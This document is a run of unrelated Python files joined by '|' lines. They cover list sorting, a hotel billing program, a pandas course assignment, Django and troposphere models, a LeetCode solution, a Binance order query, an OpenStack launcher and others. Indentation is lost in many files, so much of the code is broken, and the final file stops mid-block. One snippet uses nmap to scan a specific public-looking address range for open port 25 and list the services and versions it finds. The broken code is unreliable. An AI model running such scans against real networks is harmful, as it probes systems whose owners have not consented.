prenoms.sort()
print(prenoms)
list_prenoms = ["Anthony", "Mathilde", "Simon", "Mateu", "Ugo"]
s_prenom = sorted(list_prenoms)
print(s_prenom)
print(list_prenoms)
etudiants = [
("Clément", 14, 16),
("Charles", 12, 15),
("Oriane", 14, 18),
("Thomas", 11, 12),
("Damien", 12, 15),
]
print(sorted(etudiants))
print(sorted(etudiants, key=lambda colonne : colonne[2]))
|
class hotelkingston:
    def __init__(self, rt='', n=0, s=0, r=0, c=0, d=0, a=1800, Name='', Address='', cindate='', coutdate='', rowno=100):
        print("WELCOME TO KINGSTON HOTEL")
        print("Izhevsk, Russia, Pecochnaya 38A 426069:\n")
        self.rt = rt
        self.r = r
        self.t = 0  # was '': adding a string to the numeric bills crashed display()
        self.p = 0  # game bill accumulator; was never initialized before gamebill() used it
        self.a = a
        self.n = n
        self.s = s
        self.c = c
        self.d = d
        self.Name = Name
        self.Address = Address  # was self.address: display() reads self.Address
        self.cindate = cindate
        self.coutdate = coutdate
        self.rowno = rowno
def inputData(self):
self.Name = input("Enter your Name:")
self.Address = input("Enter your Address:")
self.cindate = input("Enter your Arrival date:")
self.coutdate = input("Enter your Departure date:")
print("Your room no.:", self.rowno, "\n")
def roomRent(self):
print(" Please select your category of room:-")
print("Note that prices are just for a night ")
print("1. Single_Room -- $50 \n")
print("2. Double_Room --$100 \n")
print("3. Triple_Room -- $150 \n")
print("4. Queens_Room --$250 \n")
print("5. kings_Room --$400 \n")
        x = int(input(" Please enter your choice from One(1) - Five(5): "))
n = int(input(" How many nights would you like to stay:"))
if (x == 1):
print("Thanks for choosing a Single_Room")
self.s = 50 * n
elif (x == 2):
print("Thanks for choosing a Double_Room")
self.s = 100 * n
elif (x == 3):
print("Thanks for choosing a Triple_Room")
self.s = 150 * n
elif (x == 4):
print("Thanks for choosing a Queens_Room")
self.s = 250 * n
elif (x == 5):
print("Thanks for choosing a Kings_Room")
self.s = 400 * n
else:
print(" Please choose a room")
print(" Rent =", self.s, "\n")
def restaurentBill(self):
print("RESTAURANT MENU")
print("1.Water = $0.5 ",
"2.Tea = $0.75",
"3.Breakfast porridge = $2.00",
"4.Lunch meat spaghetti = $5.00",
"5.Dinner potatoes fries = $ 3.50",
"6.Exit")
while (1):
c = int(input("Enter your choice:"))
if (c == 1):
d = int(input("Enter the quantity:"))
self.r = self.r + 0.5 * d
elif (c == 2):
d = int(input("Enter the quantity:"))
self.r = self.r + 0.75 * d
elif (c == 3):
d = int(input("Enter the quantity:"))
self.r = self.r + 2.00 * d
elif (c == 4):
d = int(input("Enter the quantity:"))
self.r = self.r + 5.00 * d
elif (c == 5):
d = int(input("Enter the quantity:"))
self.r = self.r + 3.50 * d
elif (c == 6):
                break
else:
print("Invalid option")
print("Total food Cost= $", self.r, "\n")
def gamebill(self):
print("GAME MENU")
print("1.Table_tennis = $5.00", "2.Bowling = $10.00","3.Video_games = $10.00",
"4.Pool = $15.00", "5.Exit")
while (1):
g = int(input("Enter your choice:"))
if (g == 1):
h = int(input("No. of hours required:"))
self.p = self.p + 5.00 * h
elif (g == 2):
h = int(input("No. of hours:"))
self.p = self.p + 10.00 * h
elif (g == 3):
h = int(input("No. of hours:"))
self.p = self.p + 10.00 * h
elif (g == 4):
h = int(input("No. of hours:"))
self.p = self.p + 15.00 * h
elif (g == 5):
                break
else:
print("Invalid option")
print("Total Game Bill=$", self.p, "\n")
    def display(self):
        print("HOTEL BILL")
        print("Clients Information:")
        print("Clients Name:", self.Name)
        print("Clients Address:", self.Address)
        print("Arrival Date:", self.cindate)
        print("Departure Date:", self.coutdate)
        print("Room_no.", self.rowno)
        print("Rent:", self.s)
        print("Food bill:", self.r)
        print("Game bill:", self.p)
        self.rt = self.s + self.t + self.p + self.r
        print("Sub total bill:", self.rt)
        print("Additional Service Charges", self.a)
        print("Grandtotal bill:", self.rt + self.a, "\n")
        self.rowno += 1
def main():
a = hotelkingston()
while (1):
print("1.Enter Clients Information")
print("2.Calculate Rent")
print("3.Calculate Restaurant_bill")
print("4.Calculate Game_bill")
print("5.Total_cost")
print("6.EXIT")
b = int(input("enter your choice:"))
        if (b == 1):
            a.inputData()
        if (b == 2):
            a.roomRent()
        if (b == 3):
            a.restaurentBill()
        if (b == 4):
            a.gamebill()
        if (b == 5):
            a.display()
        if (b == 6):
            quit()
main()
|
#All Configurations
FILE_DUPLICATE_NUM = 2 # how many replications stored
FILE_CHUNK_SIZE = 1024*1024 # 1 MB, the chunk size, may change when finishing debugging
HEADER_LENGTH = 16 # header size
SAVE_FAKE_LOG = False # for single-point-failure recovery; enabling it greatly reduces performance
IGNORE_LOCK = True # for test purpose
SERVER_LOG_FILE_NAME = 'server_write_log'
# some common convert functions shared by server and client
def name_local_to_remote(name):
return name.replace('/','[[')
def name_remote_to_local(name):
return name.replace('[[','/')
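# Illustrative round-trip of the conversion pair above:
#   name_local_to_remote('dir/file.txt') -> 'dir[[file.txt'
#   name_remote_to_local('dir[[file.txt') -> 'dir/file.txt'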
|
import os
import sys
sys.path.insert(0, 'scripts')
import experiments as exp
sys.path.insert(0, os.path.join("tools", "families"))
sys.path.insert(0, os.path.join("tools", "mappings"))
import fam
import ete3
import get_dico
def build_short_names_seq():
alphabet = " ABCDEFGHIJKLMNOPQRSTUVWXYZ"
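    # The leading space makes the first pass emit the single letters 'A'..'Z',
    # followed by two-letter names 'AA', 'AB', ..., 'ZZ'.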
seq = []
for a in alphabet:
for b in alphabet[1:]:
seq.append((a + b).replace(" ", ""))
return seq
def get_short_mapping(datadir):
    true_species_tree = ete3.Tree(fam.get_species_tree(datadir), format=1)
    short_mapping = {}
    index = 1
    short_names_seq = build_short_names_seq()
    short_mapping_file = os.path.join(fam.get_misc_dir(datadir), "short_mappings.txt")
    writer = open(short_mapping_file, "w")
    print("Writing short mapping in " + short_mapping_file)
    for name in true_species_tree.get_leaf_names():
        writer.write(short_names_seq[index] + " " + name + "\n")
        short_mapping[name] = short_names_seq[index]
        index += 1
    writer.close()
    return short_mapping
def relabel_gene_trees(datadir, gene_trees, subst_model):
    short_mapping = get_short_mapping(datadir)
    for family in fam.get_families_list(datadir):
        try:
            gene_tree_path = fam.build_gene_tree_path(datadir, subst_model, family, gene_trees)
            output_gene_tree_path = gene_tree_path + ".shortlabels"
            tree = ete3.Tree(gene_tree_path)
            # Look up the gene-to-species mapping once per family, not once per leaf
            mapping = get_dico.get_gene_to_species(datadir, family)
            for leaf in tree.get_leaves():
                leaf.name = short_mapping[mapping[leaf.name]]
            open(output_gene_tree_path, "w").write(tree.write())
        except Exception:
            print("Error for family " + family)
def relabel_species_tree(datadir, species_tree, subst_model):
    short_mapping = get_short_mapping(datadir)
    tree_path = fam.get_species_tree(datadir, subst_model, species_tree)
    print("Relabelling " + tree_path)
    tree = ete3.Tree(tree_path, format=1)
    for leaf in tree.get_leaves():
        leaf.name = short_mapping[leaf.name]
    output_tree_path = tree_path + ".shortlabels"
    open(output_tree_path, "w").write(tree.write())
    print(tree)
    print("Writing new tree in " + output_tree_path)
if (__name__== "__main__"):
if (len(sys.argv) == 5):
mode = sys.argv[1]
datadir = sys.argv[2]
method = sys.argv[3]
subst_model = sys.argv[4]
if (mode == "genes"):
relabel_gene_trees(datadir, method, subst_model)
elif(mode == "species"):
relabel_species_tree(datadir, method, subst_model)
else:
print("Invalid mode " + mode)
else:
print("Syntax:")
print(" mode datadir tree_method subst_model")
sys.exit(0)
|
def count_correct_characters(correct, guess):
    # Raising a bare string is invalid in Python 3; raise a proper exception
    if len(correct) != len(guess):
        raise ValueError("different length")
    return sum(1 for x in range(len(correct)) if correct[x] == guess[x])
'''
Consider a game, wherein the player has to guess a target word.
All the player knows is the length of the target word.
To help them in their goal, the game will accept guesses, and return
the number of letters that are in the correct position.
Write a method that, given the correct word and the player's guess,
returns this number.
For example, here's a possible thought process for someone trying to
guess the word "dog":
count_correct_characters("dog", "car"); #0 (No letters are in the correct position)
count_correct_characters("dog", "god"); #1 ("o")
count_correct_characters("dog", "cog"); #2 ("o" and "g")
count_correct_characters("dog", "cod"); #1 ("o")
count_correct_characters("dog", "bog"); #2 ("o" and "g")
count_correct_characters("dog", "dog"); #3 (Correct!)
The caller should ensure that the guessed word is always the same length as the correct word,
but since it could cause problems if this were not the case, you need to check for this eventuality:
#Raise an exception if the two parameters are of different lengths.
You may assume, however, that the two parameters will always be in the same case.
'''
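# A quick self-check of the examples above (added; not part of the original kata):
if __name__ == "__main__":
    assert count_correct_characters("dog", "car") == 0
    assert count_correct_characters("dog", "god") == 1
    assert count_correct_characters("dog", "cog") == 2
    assert count_correct_characters("dog", "dog") == 3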
|
from binance_f import RequestClient
from binance_f.constant.test import *
from binance_f.base.printobject import *
from binance_f.model.constant import *
import define
def getallorder():
request_client = RequestClient(api_key=define.api_key, secret_key=define.secret_key)
result = request_client.get_open_orders()
return len(result)
|
# coding: utf-8
# ---
#
# _You are currently looking at **version 1.5** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-data-analysis/resources/0dhYG) course resource._
#
# ---
# # Assignment 3 - More Pandas
# This assignment requires more individual learning than the last one did - you are encouraged to check out the [pandas documentation](http://pandas.pydata.org/pandas-docs/stable/) to find functions or methods you might not have used yet, or ask questions on [Stack Overflow](http://stackoverflow.com/) and tag them as pandas and python related. And of course, the discussion forums are open for interaction with your peers and the course staff.
# ### Question 1 (20%)
# Load the energy data from the file `Energy Indicators.xls`, which is a list of indicators of [energy supply and renewable electricity production](Energy%20Indicators.xls) from the [United Nations](http://unstats.un.org/unsd/environment/excel_file_tables/2013/Energy%20Indicators.xls) for the year 2013, and should be put into a DataFrame with the variable name of **energy**.
#
# Keep in mind that this is an Excel file, and not a comma separated values file. Also, make sure to exclude the footer and header information from the datafile. The first two columns are unnecessary, so you should get rid of them, and you should change the column labels so that the columns are:
#
# `['Country', 'Energy Supply', 'Energy Supply per Capita', '% Renewable']`
#
# Convert `Energy Supply` to gigajoules (there are 1,000,000 gigajoules in a petajoule). For all countries which have missing data (e.g. data with "...") make sure this is reflected as `np.NaN` values.
#
# Rename the following list of countries (for use in later questions):
#
# ```"Republic of Korea": "South Korea",
# "United States of America": "United States",
# "United Kingdom of Great Britain and Northern Ireland": "United Kingdom",
# "China, Hong Kong Special Administrative Region": "Hong Kong"```
#
# There are also several countries with numbers and/or parenthesis in their name. Be sure to remove these,
#
# e.g.
#
# `'Bolivia (Plurinational State of)'` should be `'Bolivia'`,
#
# `'Switzerland17'` should be `'Switzerland'`.
#
# <br>
#
# Next, load the GDP data from the file `world_bank.csv`, which is a csv containing countries' GDP from 1960 to 2015 from [World Bank](http://data.worldbank.org/indicator/NY.GDP.MKTP.CD). Call this DataFrame **GDP**.
#
# Make sure to skip the header, and rename the following list of countries:
#
# ```"Korea, Rep.": "South Korea",
# "Iran, Islamic Rep.": "Iran",
# "Hong Kong SAR, China": "Hong Kong"```
#
# <br>
#
# Finally, load the [Sciamgo Journal and Country Rank data for Energy Engineering and Power Technology](http://www.scimagojr.com/countryrank.php?category=2102) from the file `scimagojr-3.xlsx`, which ranks countries based on their journal contributions in the aforementioned area. Call this DataFrame **ScimEn**.
#
# Join the three datasets: GDP, Energy, and ScimEn into a new dataset (using the intersection of country names). Use only the last 10 years (2006-2015) of GDP data and only the top 15 countries by Scimagojr 'Rank' (Rank 1 through 15).
#
# The index of this DataFrame should be the name of the country, and the columns should be ['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations',
# 'Citations per document', 'H index', 'Energy Supply',
# 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008',
# '2009', '2010', '2011', '2012', '2013', '2014', '2015'].
#
# *This function should return a DataFrame with 20 columns and 15 entries.*
# In[90]:
import pandas as pd
import numpy as np
# Load the energy data from the file Energy Indicators.xls
energy = pd.read_excel('Energy Indicators.xls')
# make sure to exclude the footer and header information from the datafile
energy = energy[16:243]
# The first two columns are unnecessary, so you should get rid of them
energy = energy.drop(energy.columns[[0, 1]], axis=1)
# so that the columns are:['Country', 'Energy Supply', 'Energy Supply per Capita', '% Renewable']
energy.rename(columns={'Environmental Indicators: Energy': 'Country','Unnamed: 3':'Energy Supply','Unnamed: 4':'Energy Supply per Capita','Unnamed: 5':'% Renewable'}, inplace=True)
energy.replace('...', np.nan,inplace = True)
# Convert Energy Supply to gigajoules (there are 1,000,000 gigajoules in a petajoule)
energy['Energy Supply'] = energy['Energy Supply']*1000000
def remove(data):
cleardata = ''.join([i for i in data if not i.isdigit()])
i = cleardata.find('(')
if i>-1:
cleardata = cleardata[:i]
return cleardata.strip()
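# Examples from the problem statement: remove('Bolivia (Plurinational State of)')
# returns 'Bolivia', and remove('Switzerland17') returns 'Switzerland'.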
energy['Country'] = energy['Country'].apply(remove)
# Rename the following list of countries
rename = {"Republic of Korea": "South Korea",
"United States of America": "United States",
"United Kingdom of Great Britain and Northern Ireland": "United Kingdom",
"China, Hong Kong Special Administrative Region": "Hong Kong"}
energy.replace({"Country": rename},inplace = True)
GDP = pd.read_csv('world_bank.csv', skiprows=4)
di = {"Korea, Rep.": "South Korea",
"Iran, Islamic Rep.": "Iran",
"Hong Kong SAR, China": "Hong Kong"}
GDP.replace({"Country Name": di},inplace = True)
GDP.rename(columns={'Country Name': 'Country'}, inplace=True)
ScimEn = pd.read_excel('scimagojr-3.xlsx')
df = pd.merge(pd.merge(energy, GDP, on='Country'), ScimEn, on='Country')
df
df.set_index('Country',inplace=True)
# The index of this DataFrame should be the name of the country, and the columns should be ['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations', 'Citations per document', 'H index', 'Energy Supply', 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015'].
df = df[['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations', 'Citations per document', 'H index', 'Energy Supply', 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015']]
df.sort_values('Rank', inplace=True)
# df = (df.loc[df['Rank'].isin([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15])])
df[:15]
# In[50]:
def answer_one():
return df[:15]
# ### Question 2 (6.6%)
# The previous question joined three datasets then reduced this to just the top 15 entries. When you joined the datasets, but before you reduced this to the top 15 items, how many entries did you lose?
#
# *This function should return a single number.*
# In[5]:
get_ipython().run_cell_magic('HTML', '', '<svg width="800" height="300">\n <circle cx="150" cy="180" r="80" fill-opacity="0.2" stroke="black" stroke-width="2" fill="blue" />\n <circle cx="200" cy="100" r="80" fill-opacity="0.2" stroke="black" stroke-width="2" fill="red" />\n <circle cx="100" cy="100" r="80" fill-opacity="0.2" stroke="black" stroke-width="2" fill="green" />\n <line x1="150" y1="125" x2="300" y2="150" stroke="black" stroke-width="2" fill="black" stroke-dasharray="5,3"/>\n <text x="300" y="165" font-family="Verdana" font-size="35">Everything but this!</text>\n</svg>')
# In[36]:
def answer_two():
# Union A, B, C - Intersection A, B, C
union = pd.merge(pd.merge(energy, GDP, on='Country', how='outer'), ScimEn, on='Country', how='outer')
intersect = pd.merge(pd.merge(energy, GDP, on='Country'), ScimEn, on='Country')
answer_two = len(union)-len(intersect)
return answer_two
# ## Answer the following questions in the context of only the top 15 countries by Scimagojr Rank (aka the DataFrame returned by `answer_one()`)
# ### Question 3 (6.6%)
# What is the average GDP over the last 10 years for each country? (exclude missing values from this calculation.)
#
# *This function should return a Series named `avgGDP` with 15 countries and their average GDP sorted in descending order.*
# In[8]:
def answer_three():
Top15 = answer_one()
years = ['2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015']
avg = (Top15[years].mean(axis=1)).sort_values(ascending=False).rename('avgGDP')
return avg
# ### Question 4 (6.6%)
# By how much had the GDP changed over the 10 year span for the country with the 6th largest average GDP?
#
# *This function should return a single number.*
# In[9]:
def answer_four():
Top15 = answer_one()
Top15['avgGDP'] = answer_three()
Top15.sort_values(by='avgGDP', inplace=True, ascending=False)
change = Top15.iloc[5]['2015']-Top15.iloc[5]['2006']
return abs(change)
# ### Question 5 (6.6%)
# What is the mean `Energy Supply per Capita`?
#
# *This function should return a single number.*
# In[37]:
def answer_five():
Top15 = answer_one()
return Top15['Energy Supply per Capita'].mean()
# ### Question 6 (6.6%)
# What country has the maximum % Renewable and what is the percentage?
#
# *This function should return a tuple with the name of the country and the percentage.*
# In[38]:
def answer_six():
Top15 = answer_one()
ct = Top15.sort_values(by='% Renewable', ascending=False)
ct = ct.iloc[0]
return (ct.name, ct['% Renewable'])
# ### Question 7 (6.6%)
# Create a new column that is the ratio of Self-Citations to Total Citations.
# What is the maximum value for this new column, and what country has the highest ratio?
#
# *This function should return a tuple with the name of the country and the ratio.*
# In[39]:
def answer_seven():
Top15 = answer_one()
Top15['Citation_ratio'] = Top15['Self-citations']/Top15['Citations']
ct = Top15.sort_values(by='Citation_ratio', ascending=False)
ct = ct.iloc[0]
return ct.name, ct['Citation_ratio']
# ### Question 8 (6.6%)
#
# Create a column that estimates the population using Energy Supply and Energy Supply per capita.
# What is the third most populous country according to this estimate?
#
# *This function should return a single string value.*
# In[13]:
def answer_eight():
Top15 = answer_one()
Top15['Population'] = Top15['Energy Supply']/Top15['Energy Supply per Capita']
return Top15.sort_values(by='Population', ascending=False).iloc[2].name
# ### Question 9 (6.6%)
# Create a column that estimates the number of citable documents per person.
# What is the correlation between the number of citable documents per capita and the energy supply per capita? Use the `.corr()` method, (Pearson's correlation).
#
# *This function should return a single number.*
#
# *(Optional: Use the built-in function `plot9()` to visualize the relationship between Energy Supply per Capita vs. Citable docs per Capita)*
# In[40]:
def answer_nine():
Top15 = answer_one()
Top15['Population'] = Top15['Energy Supply'] / Top15['Energy Supply per Capita']
Top15['avg'] = Top15['Citable documents'] / Top15['Population']
    return Top15[['Energy Supply per Capita', 'avg']].corr().loc['Energy Supply per Capita', 'avg']
# In[41]:
def plot9():
    import matplotlib.pyplot as plt
get_ipython().magic('matplotlib inline')
Top15 = answer_one()
Top15['PopEst'] = Top15['Energy Supply'] / Top15['Energy Supply per Capita']
Top15['Citable docs per Capita'] = Top15['Citable documents'] / Top15['PopEst']
Top15.plot(x='Citable docs per Capita', y='Energy Supply per Capita', kind='scatter', xlim=[0, 0.0006])
# In[ ]:
#plot9() # Be sure to comment out plot9() before submitting the assignment!
# ### Question 10 (6.6%)
# Create a new column with a 1 if the country's % Renewable value is at or above the median for all countries in the top 15, and a 0 if the country's % Renewable value is below the median.
#
# *This function should return a series named `HighRenew` whose index is the country name sorted in ascending order of rank.*
# In[18]:
def answer_ten():
    Top15 = answer_one()
    med = Top15['% Renewable'].median()
    # the original referenced a nonexistent 'HighRenew' column; build it directly
    Top15['HighRenew'] = (Top15['% Renewable'] >= med).apply(lambda x: 1 if x else 0)
    Top15.sort_values(by='Rank', inplace=True)
    return Top15['HighRenew']
# ### Question 11 (6.6%)
# Use the following dictionary to group the Countries by Continent, then create a dateframe that displays the sample size (the number of countries in each continent bin), and the sum, mean, and std deviation for the estimated population of each country.
#
# ```python
# ContinentDict = {'China':'Asia',
# 'United States':'North America',
# 'Japan':'Asia',
# 'United Kingdom':'Europe',
# 'Russian Federation':'Europe',
# 'Canada':'North America',
# 'Germany':'Europe',
# 'India':'Asia',
# 'France':'Europe',
# 'South Korea':'Asia',
# 'Italy':'Europe',
# 'Spain':'Europe',
# 'Iran':'Asia',
# 'Australia':'Australia',
# 'Brazil':'South America'}
# ```
#
# *This function should return a DataFrame with index named Continent `['Asia', 'Australia', 'Europe', 'North America', 'South America']` and columns `['size', 'sum', 'mean', 'std']`*
# In[42]:
def answer_eleven():
Top15 = answer_one()
ContinentDict = {'China':'Asia',
'United States':'North America',
'Japan':'Asia',
'United Kingdom':'Europe',
'Russian Federation':'Europe',
'Canada':'North America',
'Germany':'Europe',
'India':'Asia',
'France':'Europe',
'South Korea':'Asia',
'Italy':'Europe',
'Spain':'Europe',
'Iran':'Asia',
'Australia':'Australia',
'Brazil':'South America'}
groups = pd.DataFrame(columns = ['size', 'sum', 'mean', 'std'])
Top15['Population'] = Top15['Energy Supply'] / Top15['Energy Supply per Capita']
for group, frame in Top15.groupby(ContinentDict):
groups.loc[group] = [len(frame), frame['Population'].sum(),frame['Population'].mean(),frame['Population'].std()]
return groups
# ### Question 12 (6.6%)
# Cut % Renewable into 5 bins. Group Top15 by the Continent, as well as these new % Renewable bins. How many countries are in each of these groups?
#
# *This function should return a __Series__ with a MultiIndex of `Continent`, then the bins for `% Renewable`. Do not include groups with no countries.*
# In[45]:
def answer_twelve():
Top15 = answer_one()
ContinentDict = {'China':'Asia',
'United States':'North America',
'Japan':'Asia',
'United Kingdom':'Europe',
'Russian Federation':'Europe',
'Canada':'North America',
'Germany':'Europe',
'India':'Asia',
'France':'Europe',
'South Korea':'Asia',
'Italy':'Europe',
'Spain':'Europe',
'Iran':'Asia',
'Australia':'Australia',
'Brazil':'South America'}
Top15 = Top15.reset_index()
Top15['Continent'] = [ContinentDict[country] for country in Top15['Country']]
    # Cut % Renewable into 5 bins, then group by Continent and bin
    Top15['bins'] = pd.cut(Top15['% Renewable'], 5)
    counts = Top15.groupby(['Continent', 'bins']).size()
    # Do not include groups with no countries
    return counts[counts > 0]
# ### Question 13 (6.6%)
# Convert the Population Estimate series to a string with thousands separator (using commas). Do not round the results.
#
# e.g. 317615384.61538464 -> 317,615,384.61538464
#
# *This function should return a Series `PopEst` whose index is the country name and whose values are the population estimate string.*
# In[43]:
def answer_thirteen():
    Top15 = answer_one()
    Top15['PopEst'] = (Top15['Energy Supply'] / Top15['Energy Supply per Capita']).astype(float)
    # Format with a thousands separator without rounding,
    # e.g. 317615384.61538464 -> '317,615,384.61538464'
    return Top15['PopEst'].apply(lambda x: '{:,}'.format(x))
# ### Optional
#
# Use the built in function `plot_optional()` to see an example visualization.
# In[23]:
def plot_optional():
    import matplotlib.pyplot as plt
get_ipython().magic('matplotlib inline')
Top15 = answer_one()
ax = Top15.plot(x='Rank', y='% Renewable', kind='scatter',
c=['#e41a1c','#377eb8','#e41a1c','#4daf4a','#4daf4a','#377eb8','#4daf4a','#e41a1c',
'#4daf4a','#e41a1c','#4daf4a','#4daf4a','#e41a1c','#dede00','#ff7f00'],
xticks=range(1,16), s=6*Top15['2014']/10**10, alpha=.75, figsize=[16,6]);
for i, txt in enumerate(Top15.index):
ax.annotate(txt, [Top15['Rank'][i], Top15['% Renewable'][i]], ha='center')
print("This is an example of a visualization that can be created to help understand the data. This is a bubble chart showing % Renewable vs. Rank. The size of the bubble corresponds to the countries' 2014 GDP, and the color corresponds to the continent.")
# In[ ]:
#plot_optional() # Be sure to comment out plot_optional() before submitting the assignment!
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from ahead.utils.db import DateTimeModel
SECTION_MODULE_CHOICES = (('article', '文章列表'), ('simple', '单页面'))
# class Foundation(DateTimeModel):
# pass
# class module(DateTimeModel):
# name = models.CharField('模块名称', max_length=255, unique=True)
# title = models.CharField('英文标题', max_length=255, unique=True)
class Section(DateTimeModel):
name = models.CharField('栏目名称', max_length=255, unique=True)
title = models.CharField('英文标题', max_length=255, unique=True)
module = models.CharField('选择模型', max_length=255, choices=SECTION_MODULE_CHOICES)
order = models.PositiveIntegerField('排序', default=99)
class Meta:
ordering = ['created_at']
class Article(DateTimeModel):
title = models.CharField('文章标题', max_length=255)
section = models.ForeignKey(Section)
img = models.CharField('缩略图', max_length=255, null=True, blank=True)
context = models.TextField('正文')
class Meta:
ordering = ['-created_at']
class Simple(DateTimeModel):
title = models.CharField('文章标题', max_length=255)
section = models.ForeignKey(Section)
context = models.TextField('正文')
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 43.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import integer
class AutoSnapshotAddOn(AWSProperty):
props = {
"SnapshotTimeOfDay": (str, False),
}
class AddOn(AWSProperty):
props = {
"AddOnType": (str, True),
"AutoSnapshotAddOnRequest": (AutoSnapshotAddOn, False),
"Status": (str, False),
}
class Disk(AWSObject):
resource_type = "AWS::Lightsail::Disk"
props = {
"AddOns": ([AddOn], False),
"AvailabilityZone": (str, False),
"DiskName": (str, True),
"SizeInGb": (integer, True),
"Tags": (Tags, False),
}
class Hardware(AWSProperty):
props = {
"CpuCount": (integer, False),
"Disks": ([Disk], False),
"RamSizeInGb": (integer, False),
}
class Location(AWSProperty):
props = {
"AvailabilityZone": (str, False),
"RegionName": (str, False),
}
class Port(AWSProperty):
props = {
"AccessDirection": (str, False),
"AccessFrom": (str, False),
"AccessType": (str, False),
"CidrListAliases": ([str], False),
"Cidrs": ([str], False),
"CommonName": (str, False),
"FromPort": (integer, False),
"Ipv6Cidrs": ([str], False),
"Protocol": (str, False),
"ToPort": (integer, False),
}
class Networking(AWSProperty):
props = {
"MonthlyTransfer": (dict, False),
"Ports": ([Port], True),
}
class State(AWSProperty):
props = {
"Code": (integer, False),
"Name": (str, False),
}
class Instance(AWSObject):
resource_type = "AWS::Lightsail::Instance"
props = {
"AddOns": ([AddOn], False),
"AvailabilityZone": (str, False),
"BlueprintId": (str, True),
"BundleId": (str, True),
"Hardware": (Hardware, False),
"InstanceName": (str, True),
"Location": (Location, False),
"Networking": (Networking, False),
"State": (State, False),
"Tags": (Tags, False),
}
|
from typing import List


# Minimal TreeNode definition so the snippet runs standalone
# (LeetCode normally provides this class).
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


class Solution:
    def allPossibleFBT(self, n: int) -> List[TreeNode]:
if n % 2 == 0:
return []
if n == 1:
return [TreeNode()]
res = []
for i in range(1, n, 2):
left = self.allPossibleFBT(i)
right = self.allPossibleFBT(n - i - 1)
for l in left:
for r in right:
root = TreeNode(0, l, r)
res.append(root)
return res
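# Sanity note (added): the number of full binary trees follows the Catalan numbers,
# e.g. len(Solution().allPossibleFBT(7)) == 5, and any even n yields [].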
|
import nmap
from prettytable import PrettyTable
# scan network - display all open ports in the given range
nm = nmap.PortScanner()
nm.scan('156.17.40.1-255', '25')
tab = PrettyTable(["IP address", "Protocol", "Port", "Product name",
"Version", "Extra info"])
for host in nm.all_hosts():
for proto in nm[host].all_protocols():
lport = nm[host][proto].keys()
lport.sort()
for port in lport:
# incompatible with installed nmap version
if not isinstance(port, int):
continue
item = nm[host][proto][port]
# skip closed
if not item['state'] == "open":
continue
tab.add_row([host, proto, port, item['product'], item['version'],
item['extrainfo']])
print tab
|
from numpy import genfromtxt
import numpy as np
vector_file = "/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/feature_vectors.csv"
weight_file = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/weight.csv'
weighted_vector = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/weighted_vectors.csv'
sample_file = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/sample_feature_vectors.csv'
weighted_sample = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/weighted_sample.csv'
'''
for i in range(0,l):
count.append(0)
for vector in vectors:
for j in range(0, l):
if vector[j]==1:
count[j]+=1
weight = []
for i in range(0,l):
    weight.append(float(691)/math.sqrt(float(count[i])))
print weight
np.savetxt(weight_file, weight, '%5.2f',delimiter=",")
'''
vectors = genfromtxt(sample_file, dtype=float,delimiter = ',')
vectors = np.array(vectors)
weights =genfromtxt(weight_file, dtype=float,delimiter = ',')
weights = np.array(weights)
'''
weight = []
for item in weights:
weight.append(math.sqrt(float(item)))
'''
new = np.multiply(vectors, weights)
print len(new), len(new[0])
np.savetxt(weighted_sample, new, '%5.2f',delimiter=",")
|
import os
from random import randrange
import time
import uuid
from novaclient.client import Client
import paramiko
import sys
if len(sys.argv) < 2:
print "WRONG INPUT!"
print "Usage: python create_instance.py <number_of_workers>"
sys.exit(0)
else:
NR_OF_WORKERS = int(sys.argv[1])
print "Creating " + str(NR_OF_WORKERS) + " instances"
config = {'username':os.environ['OS_USERNAME'],
'api_key':os.environ['OS_PASSWORD'],
'project_id':os.environ['OS_TENANT_NAME'],
'auth_url':os.environ['OS_AUTH_URL'],
}
nova = Client('2',**config)
floating_ips = []
def init(i_name):
instancename = "dj_worker_%i" %(i_name)
if not nova.keypairs.findall(name="Svensskey"):
with open(os.path.expanduser('svensskey.pem')) as fpubkey:
nova.keypairs.create(name="Svensskey", public_key=fpubkey.read())
#image = nova.images.find(name="Ubuntu Server 14.04 LTS (Trusty Tahr)")
image = nova.images.find(id='59a19f79-f906-44e0-964a-22d66558cc54')
flavor = nova.flavors.find(name="m1.medium")
user_data = open('userdata_worker.yml', 'r')
instance = nova.servers.create(name=instancename, image=image, flavor=flavor, key_name="Svensskey", userdata=user_data)
user_data.close()
# Poll at 5 second intervals, until the status is no longer 'BUILD'
status = instance.status
while status == 'BUILD':
time.sleep(5)
# Retrieve the instance again so the status field updates
instance = nova.servers.get(instance.id)
status = instance.status
print "status: %s" % status
secgroup = nova.security_groups.find(name="default")
try:
nova.security_group_rules.create(secgroup.id,
ip_protocol="tcp",
from_port=5001,
to_port=5001)
except Exception as e:
pass
# Assign Floating IP
iplist = nova.floating_ips.list()
random_index = randrange(0,len(iplist))
for ip_obj in iplist:
if (getattr(ip_obj, 'instance_id') == None):
floating_ip = getattr(ip_obj, 'ip')
break
else:
print "NO IPS FOUND...CREATING ONE"
new_ip = nova.floating_ips.create(getattr(nova.floating_ip_pools.list()[0],'name'))
floating_ip = getattr(new_ip, 'ip')
print "Created IP: " +str(floating_ip)
try:
instance.add_floating_ip(floating_ip)
print "Attaching IP: " + str(floating_ip)
return floating_ip
